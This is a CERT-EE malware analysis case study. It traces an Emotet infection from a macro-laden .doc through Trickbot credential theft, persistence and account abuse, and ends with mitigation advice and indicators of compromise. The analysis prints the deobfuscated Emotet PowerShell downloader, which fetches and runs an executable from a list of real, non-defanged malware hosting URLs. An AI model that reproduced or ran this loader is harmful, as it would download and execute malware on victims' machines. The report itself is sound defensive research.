Case study: the tale of one Emotet infection By: CERT-EE / Estonian Information System Authority Date: 23 October 2020 Tags: Emotet, malware, cybercrime, Trickbot

Summary Emotet malware has been around since 2014. It is mostly spread through malicious e-mail attachments, often disguised in forwarded e-mails or as a reply to a previous discussion. As Emotet uses hijacked e-mail threads to spread itself, the discussion and the sender may look familiar to the victim and therefore he or she is more likely to open the attachment. According to CERT-EE estimation, there are tens of thousands of infected files sent daily towards individuals and enterprises in Estonia, which currently make it the most prevalent malware family distributed in Estonia. As Emotet steals e-mails, there is also the risk of data leak which can result in GDPR breach or contractual penalties. Emotet is also often used as a downloader for additional malware that can steal stored credentials from browsers. Therefore, enterprises using cloud services should be extra careful and require 2-factor authentication. The purpose of this case study was to understand better how a current variation of Emotet works, so we can recommend ways to mitigate the risks in advance and also what to look out for in case of suspected infection. An important finding is that while modern anti-virus software works against a large variety of viruses, including Emotet, it is important to use their full functionality.

Case study timeline For this case study, we were using Windows 10 v.2009 as operating system with built-in Microsoft Defender antivirus with slightly modified settings. It should be noted that infecting the machine in this default configuration was not successful as Microsoft Defender removed the malware. For the infection to succeed, Defender’s “Cloud-delivered protection” had to be disabled.

Figure 1. Infected Emotet dropper .doc file where running macro had to be enabled

After clicking “Enable Content”, a well obfuscated macro was run that triggered a PowerShell in base64 and in obfuscated manner.

Figure 2. PowerShell in base64 and obfuscated

After deobfuscating and decoding base64 the following instructions were found in the PowerShell command. -------- $P2t896q=Zgmfcmh; $Cpa3yo3=$*; $T9qq_nc=Gh2sw4h;&new-item $eNv:useRprOFILe\QeZTn1z\P_WSvqA\ -itemtype dIrECtORY; $Kcg966b=Rsthnuk;[Net.ServicePointManager]::"secUriTypROtocoL" = tls12, tls11, tls; $Ua2xau0=R1x2d9w; $O0umshk=Zz2_fj; $X8y3s56=S8s1vbu; $Wd0jfik=T7mjz5l; $Zs8dvz7=$env:userprofile\Qeztn1z\P_wsvqa\$O0umshk+('.exe'); $Nj62m3r=Vj85wha; $Ly7vast=new-object NEtWEbClIENT; $Qqgc6sh=

http://financiamentointeligente.com/wp-content/Fj/* http://www.removepctrojan.com/wp-admin/6/* http://aahnaturals.net/wp-includes/TX/* http://www.sff3d.com/3d/xk/* https://engineering-2s.com/SS_Paypal/X/* https://lsmanga.com/migration/FaU/* https://beta.zoneberry.com/bysyswexecf/x3/ .spLiT($Cpa3yo3); $Ka78g_w=P_awrw3; foreach ($Kk9rucd in $Qqgc6sh){try{$Ly7vast."DOwnloADFile"($Kk9rucd, $Zs8dvz7); $Pogmg4m=Quq7lrc;If ((.Get-Item $Zs8dvz7)."lEngTh" -ge 30706) {.Invoke-Item($Zs8dvz7); $E5z9o9t=Ffm269h; break; -------- With PowerShell Emotet malware is downloaded and executed in the machine. PowerShell contained multiple sites from where to download the payload of the malware. Since the first download site had been taken down (step 1), the payload was delivered from the next site (step 2) and the payload infected the computer. It then sent out the data from the infected machine to the C2 (step 3).

Figure 3. Downloading malware payload and uploading data from victim to C2.

In less than 30 minutes the infected device is turned into Emotet spreading drone that, based on the instructions from C2, is starting to send out new malicious dropper .doc files to new victims.

Figure 4. Sending out Emotet droppers to new victims.

2.

3.

1.

In about 15 minutes from the infection the device is also infected by Trickbot malware. Below is a typical Trickbot infection of checking IP (step 1), downloading Trickbot payload (step 2), sending out Edge formdata from the browser (step 3) and stealing and sending out gMail password stored in the mail client of the infected machine (step 4).

Figure 5. Emotet infected device being infected with Trickbot malware

Figure 6. Trickbot stealing user credentials from mail client for Google account

Trickbot injects itself to communicate with C2 into Windows Problem Reporting manager service: wermgr.exe

Figure 7. Trickbot communication via wermgr.exe

To claim persistence Emotet writes itself to “HKEY_CURRENT_USER” registry hive: “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”. Trickbot uses Task Scheduler, as it creates task which executes on user-logon.

1.

2.

3.

4.

Figure 8. Trickbot persistence

Four days later, Google informs that the account has been suspended due to suspicious login.

Figure 9. Notification (in Estonian) that the account has been suspended

After account recovery, it is evident from the logs that Google disabled the account after a suspicious log in attempt from Vietnam using the stolen credentials.

Figure 10. Login attempt from Vietnam that triggered account suspension

Figure 11. Login attempt from Vietnam that triggered account suspension

From the behaviour of Emotet, it is evident that on top of using the infected device in sending out new malware, stolen e-mail accounts are used to spread malicious files.

Figure 12. Google account was used for sending malware

Conclusion Emotet remains a villain that needs to be taken seriously on its own as well as a source for new malware which in our case was Trickbot. This proves that both malware families remain up and running despite efforts to bring an end to them. Based on this case-study, CERT-EE recommends enterprises to:

• consider using antivirus software to its fullest functionality. Disabling features that different antivirus vendors have developed to protect their customers (e.g. leveraging on cloud-based information) means users are putting themselves and their enterprises at risk;

• consider setting up a policy for mandatory and regular “full-scans” and central management and alerting for antivirus products;

• consider blocking/quarantining e-mails with documents that contain macros or password-protected archives on perimeter so that such attachments do not end up in users’ mailbox;

• for visibility and detection enterprises should ensure their visibility is not reduced by moving devices outside their perimeter. Visibility of the devices should remain through various technical means such as “Always-on forced VPN tunnels”. The use of split tunneling should also be weighed against the risk of suspicious traffic bypassing firewall/IDS/IPS investments;

• since both Emotet and Trickbot used users profile directory for its actions and persistence, enterprises should consider enforcing AppLocker (Windows 10/Windows Server) policies. They should be designed so that only in whitelisted

directories executable programs/scripts are allowed to be executed, excluding users profile directory and any other, where user has the right to write in;

• user should not have administrator role assigned to their account. For administrative purposes there should be another account which has limitations on other aspects e.g. no mailbox, limited access to network resources etc;

• e-mail service providers should consider having similar checks on e-mails containing malicious URLs and malware and disregard delivery for both inbound and outbound traffic.

Disclaimer Microsoft Defender was not defeated by any means by Emotet or Trickbot in this case study. In fact, we had to disable “Cloud-delivered protection” to let mentioned malware to perform at its most effective way to learn its behavior. We did not disable Defender updates and after every update Defender turned its “real-time protection” back to default setting: ON. This did not require any user interaction. CERT-EE is a department of Estonian Information System Authority that deals with cyber security incidents that occur in Estonian networks and is in accordance with NIS Directive and Cybersecurity Act the single point of contact for Estonia.

IoCs URL: http[:]//financiamentointeligente[.]com/wp-content/Fj/ http[:]//www.removepctrojan[.]com/wp-admin/6/ http[:]//aahnaturals[.]net/wp-includes/TX/ http[:]//www.sff3d[.]com/3d/xk/ http[:]//engineering-2s[.]com/SS_Paypal/X/ http[:]//lsmanga[.]com/migration/FaU/ http[:]//beta.zoneberry[.]com/bysyswexecf/x3/ JA3: 72a589da586844d7f0818ce684948eea IP: 80.85.156.116 199.38.121.150 199.38.123.58 208.86.162.215 199.38.120.91 208.86.161.113 208.86.162.241 103.206.128.121 199.38.120.89 103.109.78.174

103.127.165.250 45.89.127.244 104.161.32.125 164.68.107.55 194.5.249.241 181.166.205.18 115.75.42.47 202.79.35.15 124.105.35.15 124.105.107.57 111.246.43.36